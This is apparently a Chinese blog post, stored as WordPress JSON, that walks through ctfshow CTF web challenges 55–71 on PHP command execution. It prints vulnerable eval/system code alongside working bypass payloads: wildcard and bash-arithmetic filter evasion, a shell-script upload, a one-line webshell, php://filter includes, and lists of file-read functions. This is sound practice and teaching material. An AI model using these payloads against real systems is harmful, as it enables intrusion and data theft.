{"id":274,"date":"2022-09-14T01:06:55","date_gmt":"2022-09-13T17:06:55","guid":{"rendered":"http:\/\/162.14.82.114\/?p=274"},"modified":"2022-09-14T01:08:57","modified_gmt":"2022-09-13T17:08:57","slug":"web%e5%85%a5%e9%97%a8-%e5%91%bd%e4%bb%a4%e6%89%a7%e8%a1%8c%e4%ba%8c","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/274\/09\/14\/2022\/","title":{"rendered":"WEB\u5165\u95e8\u2014\u2014\u547d\u4ee4\u6267\u884c(\u4e8c)"},"content":{"rendered":"

\"VeryCapture_20220914010245\"<\/div><\/p>\n

web55<\/h1>\n
<?php\n\/\/ \u4f60\u4eec\u5728\u70ab\u6280\u5417\uff1f\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|[a-z]|\\`|\\%|\\x09|\\x26|\\>|\\<\/i", $c)){\n        system($c);\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u8fc7\u6ee4\u6389\u4e86\u5b57\u6bcd\uff0c\u8054\u60f3\u5230\u524d\u9762\u7684\u65e0\u5b57\u6bcd\u6570\u5b57\u7684\u547d\u4ee4\u6267\u884c<\/p>\n
\n
\u53ef\u4ee5\u53c2\u8003\u8fd9\u4e24\u7bc7blog\uff1a<\/p>\n
\u65e0\u5b57\u6bcd\u6570\u5b57webshell\u4e4b\u63d0\u9ad8\u7bc7<\/a><\/p>\n
\u65e0\u5b57\u6bcd\u6570\u5b57\u7684\u547d\u4ee4\u6267\u884c<\/a><\/p>\n<\/blockquote>\n
\u60f3\u4e0d\u660e\u767d\uff0c\u8fd8\u662f\u5148\u8ddf\u7740\u5e08\u5085\u4eec\u601d\u8def\u5148\u8d70\u4e00\u904d\u5427\u3002<\/p>\n
\u65b9\u6cd5\u4e00\uff1a\u5339\u914dbin\u4e0b\u5b58\u5728\u7684\u547d\u4ee4\u8fdb\u884c\u8bfb\u53d6<\/h2>\n
\u9898\u76ee\u53ea\u7981\u7528\u4e86\u5b57\u6bcd\u6ca1\u6709\u7981\u7528\u6570\u5b57\uff0c\u53ef\u4ee5\u4f7f\u7528base64\u547d\u4ee4\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n
payload:\/?c=\/???\/????64 ????.???                     \n        \/?c=\/bin\/base64 flag.php<\/code><\/pre>\n
\u5f97\u5230\uff1a<\/p>\n
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMg QERhdGU6ICAgMjAyMC0wOS0wNyAxOTo0MDo1Mw0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhh DQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDcgMTk6NDE6MDANCiMgQGVtYWlsOiBo MXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxh Zz0iY3Rmc2hvd3s3OGRjOWE2My02Y2I5LTQ2ZTgtOGI0Ny0yYzUzOWNiYmZjODJ9Ijs=<\/code><\/pre>\n
\u89e3\u7801\u4e00\u4e0b\uff1a<\/p>\n
<?php\n\n\/*\n# -*- coding: utf-8 -*-\n# @Author: h1xa\n# @Date:   2020-09-07 19:40:53\n# @Last Modified by:   h1xa\n# @Last Modified time: 2020-09-07 19:41:00\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n\n*\/\n\n$flag="ctfshow{78dc9a63-6cb9-46e8-8b47-2c539cbbfc82}";<\/code><\/pre>\n
\u5f97\u5230flag\uff01<\/p>\n
\u65b9\u6cd5\u4e8c\uff1a\u4e0a\u4f20\u5e76\u6267\u884c\u811a\u672c\u6587\u4ef6<\/h2>\n
\u6784\u5efa\u6570\u636e\u5305<\/h3>\n
\u53c2\u8003Firebasky<\/a>\u5e08\u5085\u7684\u6587\u7ae0\uff0c\u9996\u5148\u8981\u6784\u9020\u4e00\u4e2aPOST\u4f20\u8f93\u6587\u4ef6\u7684\u6570\u636e\u5305\uff1a<\/p>\n
<!doctype html>\n<html lang="en">\n<head>\n    <meta charset="UTF-8">\n    <meta name="viewport"\n          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">\n    <meta http-equiv="X-UA-Compatible" content="ie=edge">\n    <title>POST\u6587\u4ef6\u4f20\u8f93POC<\/title>\n<\/head>\n<body>\n<form action="http:\/\/b3b090d7-4879-4610-b1a9-a8c0df585f52.challenge.ctf.show\/" method="post" enctype="multipart\/form-data">\n    <label for="file">\u6587\u4ef6\u540d\uff1a<\/label>\n    <input type="file" name="file" id="file"><br>\n    <input type="submit" name="submit" value="\u63d0\u4ea4">\n<\/form>\n<\/body>\n<\/html><\/code><\/pre>\n
\u6293\u5305<\/h3>\n
\"image-20220913103119703\"<\/div><\/p>\n
\u6784\u9020POC\u4f20\u8f93\u547d\u4ee4<\/h3>\n
?c=.+\/???\/????????[@-[]<\/code><\/pre>\n
\u6ce8\uff1a\u540e\u9762\u7684[@-[]<\/code>\u662flinux\u4e0b\u9762\u7684\u5339\u914d\u7b26\uff0c\u662f\u8fdb\u884c\u5339\u914d\u7684\u5927\u5199\u5b57\u6bcd\u3002<\/p>\n
\u6539\u5305<\/h3>\n
\u8fd9\u91cc\u548c\u4e0a\u9762\u4e0d\u4e00\u6837\u662f\u56e0\u4e3a\u4e2d\u9014\u73af\u5883\u8fc7\u671f\u4e86\uff0c\u6240\u4ee5\u91cd\u542f\u73af\u5883\u4ee5\u540e\u53d8\u5f97\u4e0d\u4e00\u6837\u4e86<\/code><\/p>\n
\u6211\u8fd9\u91cc\u4e00\u76f4\u51fa\u73b0\u4e0b\u5217\u56de\u5e94\uff1a<\/p>\n
HTTP\/1.1 200 OK\nDate: Tue, 13 Sep 2022 02:41:42 GMT\nContent-Type: text\/html; charset=UTF-8\nConnection: close\nServer: nginx\/1.18.0 (Ubuntu)\nX-Powered-By: PHP\/7.3.11\nContent-Length: 0<\/code><\/pre>\n
\u5c06#!\/bin\/sh<\/code>\u53bb\u6389\u5c31\u597d\u4e86\uff01\uff01\uff01<\/p>\n
\"image-20220913112335951\"<\/div>
\n
\"image-20220913112402986\"<\/div><\/p>\n
\u5f97\u5230flag\uff01\uff01\uff01\uff01<\/p>\n
web56<\/h1>\n
<?php\n\/\/ \u4f60\u4eec\u5728\u70ab\u6280\u5417\uff1f\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|[a-z]|[0-9]|\\\\$|\\(|\\{|\\'|\\"|\\`|\\%|\\x09|\\x26|\\>|\\<\/i", $c)){\n        system($c);\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u8fc7\u6ee4\u4e86\u6570\u5b57\u5b57\u6bcd\u7b49\uff0c\u540c\u4e0a\u4e00\u9898\u6b65\u9aa4\uff0c\u6293\u5305\u6539\u5305\u5f97\u5230flag\uff01\uff01<\/p>\n
\"image-20220913111936149\"<\/div><\/p>\n
web57<\/h1>\n
\u547d\u4ee4\u6267\u884c\uff0c\u9700\u8981\u4e25\u683c\u7684\u8fc7\u6ee4\uff0c\u5df2\u6d4b\u8bd5\uff0c\u53ef\u7ed5<\/code><\/pre>\n
<?php\n\/\/ \u8fd8\u80fd\u70ab\u7684\u52a8\u5417\uff1f\n\/\/flag in 36.php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|[a-z]|[0-9]|\\`|\\|\\#|\\'|\\"|\\`|\\%|\\x09|\\x26|\\x0a|\\>|\\<|\\.|\\,|\\?|\\*|\\-|\\=|\\[\/i", $c)){\n        system("cat ".$c.".php");\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\n
\u8fd9\u91cc\u53c2\u8003\u5e08\u5085\u4eec\u7684\u505a\u6cd5\u662f\u5229\u7528$<\/code>\u3001~<\/code>\u548c()<\/code>\u914d\u5408\u8fd0\u7b97\u7b26\u6784\u902036\u7684\u3002<\/p>\n
$(())<\/code>\u5728 liunux \u8868\u793a\u65e0\u8fd0\u7b97\uff0c\u503c\u4e3a0<\/code>\uff0c\u5bf9\u5176\u53d6\u53cd\u518d\u6b21\u8fd0\u884c\u4e00\u4e0b\uff0c$((~$(())))<\/code>\u503c\u4e3a-1<\/code>`<\/p>\n
`$(($((~$(())))$((~$(())))))<\/code> \u662f-1-1<\/code>\u5373\u4e3a-2<\/code><\/p>\n
$((~$(($((~$(())))$((~$(())))))))<\/code>\u662f1<\/code><\/p>\n
\u82e5\u5bf9x<\/code>\u6309\u4f4d\u53d6\u53cd\uff0c\u5176\u7ed3\u679c\u662f\u4e3a-(x+1)<\/code><\/p>\n<\/blockquote>\n
\u5199\u4e00\u4e2a\u7b80\u5355\u7684\u811a\u672c\u751f\u6210 payload\uff1a<\/p>\n
payload = "$((~$(("+"$((~$(())))"*37+"))))"\nprint(payload)<\/code><\/pre>\n
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))<\/code><\/pre>\n
\u76f4\u63a5GET\u4f20\u9012\u5230c\u91cc\u53bb\uff0c\u67e5\u770b\u6e90\u4ee3\u7801\u5c31\u77e5\u9053\u4e86flag\u3002<\/p>\n
Hint<\/h2>\n
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~\n$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~\n$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~\n$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~\n$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~\n$(())))$((~$(())))$((~$(())))))))\n${_} ="" \/\/\u8fd4\u56de\u4e0a\u4e00\u6b21\u547d\u4ee4\n$((${_}))=0\n$((~$((${_}))))=-1<\/code><\/pre>\n
\u5176\u4ed6\u59ff\u52bf\uff08\u8fd9\u91cc\u660e\u663e\u4e0d\u592a\u5bf9\uff0c\u4f30\u8ba1\u662f\u653e\u9519\u4f4d\u7f6e\u4e86\uff09<\/p>\n
?c=grep${IFS}'fla'${IFS}fla??php<\/code><\/pre>\n
web58<\/h1>\n
\u547d\u4ee4\u6267\u884c\uff0c\u7a81\u7834\u7981\u7528\u51fd\u6570<\/code><\/pre>\n
<?php\n\/\/ \u4f60\u4eec\u5728\u70ab\u6280\u5417\uff1f\nif(isset($_POST['c'])){\n        $c= $_POST['c'];\n        eval($c);\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u8981\u6c42POST\u4f20\u9012\u4e00\u4e2a\u53c2\u6570c\uff0c\u7136\u540e\u4f1a\u6267\u884c\u3002<\/p>\n
\u65b9\u6cd5\u4e00\uff1a\u4e00\u53e5\u8bdd\u6728\u9a6c<\/h2>\n
\"image-20220913153948369\"<\/div><\/p>\n
\u7136\u540e\u76f4\u63a5\u627e\u5230 flag \u5373\u53ef\u3002<\/p>\n
\u65b9\u6cd5\u4e8c\uff1a\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6<\/h2>\n
\u968f\u610f\u8bd5\u4e00\u4e0b\u5c31\u80fd\u53d1\u73b0\u5f88\u591a\u51fd\u6570\u90fd\u88ab\u7981\u7528\u4e86\uff0c\u4f8b\u5982shell_exec<\/code>\u3001system<\/code>\u3001phpinfo<\/code>\u7b49\u3002<\/p>\n
\u5927\u5e08\u5085\u662f\u4f7f\u7528c=echo file_get_contents('flag.php') <\/code>\u8fdb\u884c\u8bfb\u53d6\u7684\u3002<\/p>\n
\u6211\u662f\u4f7f\u7528c=readfile('flag.php');<\/code>\u4e5f\u53ef\u4ee5<\/p>\n
\u8fd9\u91cc\u9644\u4e0a\u4e00\u4e9b\u5e38\u7528\u7684\u6587\u4ef6\u8bfb\u53d6\u51fd\u6570\uff1a<\/p>\n
hightlight_file($filename);\nshow_source($filename);\nprint_r(php_strip_whitespace($filename));\nprint_r(file_get_contents($filename));\nreadfile($filename);\nprint_r(file($filename)); \/\/ var_dump\nfread(fopen($filename,"r"), $size);\ninclude($filename); \/\/ \u975ephp\u4ee3\u7801\ninclude_once($filename); \/\/ \u975ephp\u4ee3\u7801\nrequire($filename); \/\/ \u975ephp\u4ee3\u7801\nrequire_once($filename); \/\/ \u975ephp\u4ee3\u7801\nprint_r(fread(popen("cat flag", "r"), $size));\nprint_r(fgets(fopen($filename, "r"))); \/\/ \u8bfb\u53d6\u4e00\u884c\nfpassthru(fopen($filename, "r")); \/\/ \u4ece\u5f53\u524d\u4f4d\u7f6e\u4e00\u76f4\u8bfb\u53d6\u5230 EOF\nprint_r(fgetcsv(fopen($filename,"r"), $size));\nprint_r(fgetss(fopen($filename, "r"))); \/\/ \u4ece\u6587\u4ef6\u6307\u9488\u4e2d\u8bfb\u53d6\u4e00\u884c\u5e76\u8fc7\u6ee4\u6389 HTML \u6807\u8bb0\nprint_r(fscanf(fopen("flag", "r"),"%s"));\nprint_r(parse_ini_file($filename)); \/\/ \u5931\u8d25\u65f6\u8fd4\u56de false , \u6210\u529f\u8fd4\u56de\u914d\u7f6e\u6570\u7ec4<\/code><\/pre>\n
\u8fd8\u6709\u5217\u76ee\u5f55<\/p>\n
print_r(glob("*")); \/\/ \u5217\u5f53\u524d\u76ee\u5f55\nprint_r(glob("\/*")); \/\/ \u5217\u6839\u76ee\u5f55\nprint_r(scandir("."));\nprint_r(scandir("\/"));\n$d=opendir(".");while(false!==($f=readdir($d))){echo"$f\\n";}\n$d=dir(".");while(false!==($f=$d->read())){echo$f."\\n";}<\/code><\/pre>\n
Hint<\/h2>\n
c=show_source('flag.php');<\/code><\/pre>\n
web59<\/h1>\n
<?php\n\/\/ \u4f60\u4eec\u5728\u70ab\u6280\u5417\uff1f\nif(isset($_POST['c'])){\n        $c= $_POST['c'];\n        eval($c);\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u867d\u7136\u6ca1\u8bf4\u4f46\u662f\u53c8\u7981\u7528\u4e86\u5f88\u591a\u51fd\u6570\uff01\uff01\uff01readfile<\/code>\u4e0d\u884c\u4e86\u3002\u3002\u3002\u3002<\/p>\n
\u65b9\u6cd5\u4e00\uff1a\u4e00\u53e5\u8bdd\u6728\u9a6c<\/h2>\n
\u8681\u5251\u8fde\u63a5\u4e00\u4e0b\u5c31\u884c\u4e86\uff01<\/p>\n
\"image-20220913160958518\"<\/div><\/p>\n
\u65b9\u6cd5\u4e8c\uff1a\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6<\/h2>\n
include<\/code>\u6587\u4ef6\u5305\u542b\u914d\u5408\u4f2a\u534f\u8bae\u8bfb\u53d6<\/p>\n
\"image-20220913161252067\"<\/div><\/p>\n
\u89e3\u7801\u4e00\u4e0b\u5f97\u5230flag\uff01\uff01\uff01<\/p>\n
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNyAxOTo0MDo1Mw0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDcgMTk6NDE6MDANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3tjODQ3YjUwMS01MzVlLTRiZDYtYmY2NC0wNDU3ZjA4MWJhYzB9Ijs=1\n------------------------------------------------------\n<?php\n\n\/*\n# -*- coding: utf-8 -*-\n# @Author: h1xa\n# @Date:   2020-09-07 19:40:53\n# @Last Modified by:   h1xa\n# @Last Modified time: 2020-09-07 19:41:00\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n\n*\/\n\n$flag="ctfshow{c847b501-535e-4bd6-bf64-0457f081bac0}";<\/code><\/pre>\n
\u5f97\u5230flag\uff01<\/p>\n
Hint<\/h2>\n
c=show_source('flag.php');<\/code><\/pre>\n
web60<\/h1>\n
<?php\n\/\/ \u4f60\u4eec\u5728\u70ab\u6280\u5417\uff1f\nif(isset($_POST['c'])){\n        $c= $_POST['c'];\n        eval($c);\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u7ee7\u7eedinclude\u7ed3\u5408\u4f2a\u534f\u8bae\u5c31\u884c\u4e86\uff01PS:\u8fd9\u91cc\u5207\u8bb0\u4e0d\u80fd\u5728\u7b49\u53f7\u5de6\u53f3\u52a0\u7a7a\u683c\uff0c\u4f1a\u51fa\u610f\u5916\uff0c\u522b\u95ee\u6211\u548b\u77e5\u9053\u7684<\/code><\/p>\n
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNyAxOTo0MDo1Mw0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDcgMTk6NDE6MDANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3s2ZTMwZDYxZC00ZDY2LTRmMTItYTEyZi1lZDVkYWJjZWY2MGZ9Ijs=1\n----------------------------------------------------\n<?php\n\n\/*\n# -*- coding: utf-8 -*-\n# @Author: h1xa\n# @Date:   2020-09-07 19:40:53\n# @Last Modified by:   h1xa\n# @Last Modified time: 2020-09-07 19:41:00\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n\n*\/\n\n$flag="ctfshow{6e30d61d-4d66-4f12-a12f-ed5dabcef60f}";<\/code><\/pre>\n
Hint<\/h2>\n
c=show_source('flag.php');<\/code><\/pre>\n
web61<\/h1>\n
if(isset($_POST['c'])){\n        $c= $_POST['c'];\n        eval($c);\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u6587\u4ef6\u8bfb\u53d6\u51fd\u6570\u8fdb\u884c\u8bfb\u53d6\u5373\u53ef\uff1a<\/p>\n
c=show_source("flag.php");\nc=highlight_file("flag.php");<\/code><\/pre>\n
Hint<\/h2>\n
c=show_source('flag.php');<\/code><\/pre>\n
web62<\/h1>\n
if(isset($_POST['c'])){\n        $c= $_POST['c'];\n        eval($c);\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u540cweb61\uff01\uff01\uff01<\/code><\/strong><\/p>\n
\u770b\u5230\u4e5f\u6709\u5e08\u5085\u662f\u8fd9\u4e48\u89e3\u7684\uff1a<\/p>\n
c=include('flag.php');echo $flag;<\/code><\/pre>\n
web63<\/h1>\n
<?php\n\/\/ \u4f60\u4eec\u5728\u70ab\u6280\u5417\uff1f\nif(isset($_POST['c'])){\n        $c= $_POST['c'];\n        eval($c);\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
\u4e0a\u9762\u7684\u65b9\u6cd5\u8fd8\u53ef\u4ee5\u7528\uff0c\u9664\u6b64\u4e4b\u5916\u53ef\u4ee5\u4f7f\u7528\u5927\u5e08\u5085\u7684\u89e3\u6cd5\uff01\uff01<\/p>\n
c=include("flag.php");var_dump(get_defined_vars());<\/code><\/pre>\n
web64<\/h1>\n
\u547d\u4ee4\u6267\u884c\uff0c\u7a81\u7834\u7981\u7528\u51fd\u6570\uff0c\u771f\u7684\u662f \u79c0\u4e0d\u8fc7\u4f60\u4eec<\/code><\/pre>\n
\u76f4\u63a5\u4f7f\u7528show_source("flag.php");<\/code>\u5373\u53ef\uff01<\/p>\n
web65<\/h1>\n
\u547d\u4ee4\u6267\u884c\uff0c\u7a81\u7834\u7981\u7528\u51fd\u6570\uff0c\u6c42\u4f60\u4eec\u522b\u79c0\u4e86<\/code><\/pre>\n
\u5927\u5e08\u5085\u8fd9\u91cc\u4f7f\u7528\u7684\u662fphp curl<\/code>\u53d1\u9001GET\u8bf7\u6c42\uff0c\u4f46\u662f\u5931\u8d25\u4e86\uff0c\u53ef\u4ee5\u8fdb\u884c\u4e86\u89e3\u4e00\u4e0b\uff01<\/p>\n
# php curl\u53d1\u9001GET\u6570\u636e\n<?php\n\/\/\u521d\u59cb\u5316\n$curl = curl_init();\n\/\/\u8bbe\u7f6eurl\ncurl_setopt($curl, CURLOPT_URL, 'http:\/\/httpbin.org\/get');\n\/\/ \u4e0d\u8fd4\u56deHTTP\u5934\u90e8\u4fe1\u606f\ncurl_setopt($curl, CURLOPT_HEADER, false);\n\/\/ \u8bbe\u7f6e\u83b7\u53d6\u7684\u4fe1\u606f\u4ee5\u6587\u4ef6\u6d41\u7684\u5f62\u5f0f\u8fd4\u56de\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\n\/\/ \u6267\u884c\u547d\u4ee4\n$data = curl_exec($curl);\n\/\/ \u5173\u95edURL\u8bf7\u6c42\ncurl_close($curl);\n\/\/ \u663e\u793a\u83b7\u5f97\u7684\u6570\u636e\nprint_r($data);<\/code><\/pre>\n
# php curl\u53d1\u9001POST\u6570\u636e\n<?php\n\/\/\u521d\u59cb\u5316\n$curl = curl_init();\n\/\/\u8bbe\u7f6eurl\ncurl_setopt($curl, CURLOPT_URL, 'http:\/\/httpbin.org\/post');\n\/\/ \u6807\u8bc6\u8fd9\u4e2a\u8bf7\u6c42\u662f\u4e00\u4e2aPOST\u8bf7\u6c42\ncurl_setopt($curl, CURLOPT_POST,true);\n$data = ['name'=> "Tom", "age"=> 23];\n\/\/ http_build_query\u63d0\u4ea4application\/x-www-form-urlencoded\n\/\/ \u5426\u5219\u4f7f\u7528multipart\/form-data\u7c7b\u578b\ncurl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($data));\n\/\/ \u4e0d\u8fd4\u56deHTTP\u5934\u90e8\u4fe1\u606f\ncurl_setopt($curl, CURLOPT_HEADER, false);\n\/\/ \u8bbe\u7f6e\u83b7\u53d6\u7684\u4fe1\u606f\u4ee5\u6587\u4ef6\u6d41\u7684\u5f62\u5f0f\u8fd4\u56de\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\n\/\/ \u6267\u884c\u547d\u4ee4\n$response = curl_exec($curl);\n\/\/ \u5173\u95edURL\u8bf7\u6c42\ncurl_close($curl);\n\/\/ \u663e\u793a\u83b7\u5f97\u7684\u6570\u636e\nprint_r($response);<\/code><\/pre>\n
\u7ee7\u7eed\u4f7f\u7528show_source()<\/code>\u5373\u53ef\u3002<\/p>\n
web66<\/h1>\n
\u8fd9\u9898\u65e0\u6cd5\u4f7f\u7528show_source<\/code>\uff0c\u4f7f\u7528highlight_file<\/code>\u5373\u53ef\uff1a<\/del><\/p>\n
c=highlight_file("flag.php");<\/code><\/pre>\n
<?php\n\/*\n# -*- coding: utf-8 -*-\n# @Author: h1xa\n# @Date:   2020-09-07 19:40:53\n# @Last Modified by:   h1xa\n# @Last Modified time: 2020-09-07 19:41:00\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n*\/\n$flag="\u79c0\u79c0\u5f97\u4e86,\u8fd9\u6b21\u4e0d\u5728\u8fd9\u91cc";<\/code><\/pre>\n
\u67e5\u770b\u4e00\u4e0b\u76ee\u5f55\uff1a<\/p>\n
c=var_dump(scandir('\/'));<\/code><\/pre>\n
array(21) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(3) "dev" [5]=> string(3) "etc" [6]=> string(8) "flag.txt" [7]=> string(4) "home" [8]=> string(3) "lib" [9]=> string(5) "media" [10]=> string(3) "mnt" [11]=> string(3) "opt" [12]=> string(4) "proc" [13]=> string(4) "root" [14]=> string(3) "run" [15]=> string(4) "sbin" [16]=> string(3) "srv" [17]=> string(3) "sys" [18]=> string(3) "tmp" [19]=> string(3) "usr" [20]=> string(3) "var" }<\/code><\/pre>\n
\u627e\u5230\u6709\u4e00\u4e2aflag.txt<\/code>\uff0c\u518d\u6b21\u4f7f\u7528highlight_file<\/code><\/p>\n
c=highlight_file("..\/..\/..\/flag.txt");<\/code><\/pre>\n
\u5f97\u5230flag\uff01<\/p>\n
Hint<\/h2>\n
c=print_r(scandir("\/"));\nc=highlight_file('\/flag.txt');<\/code><\/pre>\n
web67<\/h1>\n
\u7ee7\u7eed\u4e0a\u4e00\u9898\u7684\u601d\u8def\u5373\u53ef\uff1a<\/p>\n
c=highlight_file("\/flag.txt");<\/code><\/pre>\n
Hint<\/h2>\n
c=highlight_file('\/flag.txt');<\/code><\/pre>\n
web68<\/h1>\n
Warning: highlight_file() has been disabled for security reasons in \/var\/www\/html\/index.php on line 19<\/code><\/pre>\n
\u90a3\u5c31\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n
c=include("flag.php");echo $flag;<\/code><\/pre>\n
\u79c0\u79c0\u5f97\u4e86,\u8fd9\u6b21\u4e0d\u5728\u8fd9\u91cc<\/code><\/pre>\n
\u67e5\u770b\u4e00\u4e0b\u8def\u5f84\uff1a<\/p>\n
c=var_dump(scandir('\/'));<\/code><\/pre>\n
array(21) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(3) "dev" [5]=> string(3) "etc" [6]=> string(8) "flag.txt" [7]=> string(4) "home" [8]=> string(3) "lib" [9]=> string(5) "media" [10]=> string(3) "mnt" [11]=> string(3) "opt" [12]=> string(4) "proc" [13]=> string(4) "root" [14]=> string(3) "run" [15]=> string(4) "sbin" [16]=> string(3) "srv" [17]=> string(3) "sys" [18]=> string(3) "tmp" [19]=> string(3) "usr" [20]=> string(3) "var" }<\/code><\/pre>\n
php\u6709\u4ee5\u4e0b\u51e0\u79cd\u8bfb\u53d6\u76ee\u5f55\u7684\u65b9\u5f0f\uff1a<\/p>\n
print_r(glob("*")); \/\/ \u5217\u5f53\u524d\u76ee\u5f55\nprint_r(glob("\/*")); \/\/ \u5217\u6839\u76ee\u5f55\nprint_r(scandir("."));\nprint_r(scandir("\/"));\n$d=opendir(".");while(false!==($f=readdir($d))){echo"$f\\n";}\n$d=dir(".");while(false!==($f=$d->read())){echo$f."\\n";}\n$a=glob("\/*");foreach($a as $value){echo $value."   ";}\n$a=new DirectoryIterator('glob:\/\/\/*');foreach($a as $f){echo($f->__toString()." ");}<\/code><\/pre>\n
\u53d1\u73b0\u4e86flag.txt<\/code>\uff0c\u6587\u4ef6\u5305\u542b\u4e00\u4e0b\uff01<\/p>\n
c=include("\/flag.txt");echo $flag;<\/code><\/pre>\n
\u5f97\u5230flag!<\/p>\n
Hint<\/h2>\n
\u5c1d\u8bd5include('index.php');\n\u53d1\u73b0\u5b57\u8282\u592a\u5927\u4e86 \u76f4\u63a5\u76f2\u731c c=include('\/flag.txt')<\/code><\/pre>\n
web69<\/h1>\n
Warning: highlight_file() has been disabled for security reasons in \/var\/www\/html\/index.php on line 19<\/code><\/pre>\n
c=include("\/flag.txt");echo $flag;<\/code><\/pre>\n
\u4e00\u628a\u68ad\uff01<\/p>\n
Hint<\/h2>\n
\u5c1d\u8bd5include('index.php'); \u53d1\u73b0\u5b57\u8282\u592a\u5927\u4e86 \u76f4\u63a5\u76f2\u731c c=include('\/flag.txt')<\/code><\/pre>\n
web70<\/h1>\n
Warning: error_reporting() has been disabled for security reasons in \/var\/www\/html\/index.php on line 14\nWarning: ini_set() has been disabled for security reasons in \/var\/www\/html\/index.php on line 15\nWarning: highlight_file() has been disabled for security reasons in \/var\/www\/html\/index.php on line 21\n\u4f60\u8981\u4e0a\u5929\u5417\uff1f<\/code><\/pre>\n
\u7ee7\u7eed\u6587\u4ef6\u5305\u542b\u4e00\u628a\u68ad\uff01<\/p>\n
c=include("\/flag.txt");echo $flag;<\/code><\/pre>\n
Hint<\/h2>\n
\u5c1d\u8bd5include('index.php'); \u53d1\u73b0\u5b57\u8282\u592a\u5927\u4e86 \u76f4\u63a5\u76f2\u731c c=include('\/flag.txt')<\/code><\/pre>\n
web71<\/h1>\n
\u9898\u76ee\u7ed9\u4e86\u4e00\u4e2aindex.php<\/code>\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n
<?php\n    error_reporting(0);\nini_set('display_errors', 0);\n\/\/ \u4f60\u4eec\u5728\u70ab\u6280\u5417\uff1f\nif(isset($_POST['c'])){\n    $c= $_POST['c'];\n    eval($c);\n    $s = ob_get_contents();\n    ob_end_clean();\n    echo preg_replace("\/[0-9]|[a-z]\/i","?",$s);\n}else{\n    highlight_file(__FILE__);\n}\n?>\n    \u4f60\u8981\u4e0a\u5929\u5417\uff1f<\/code><\/pre>\n
\u6253\u5f00\u73af\u5883\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n
Warning: error_reporting() has been disabled for security reasons in \/var\/www\/html\/index.php on line 14\nWarning: ini_set() has been disabled for security reasons in \/var\/www\/html\/index.php on line 15\nWarning: highlight_file() has been disabled for security reasons in \/var\/www\/html\/index.php on line 24\n\u4f60\u8981\u4e0a\u5929\u5417\uff1f<\/code><\/pre>\n
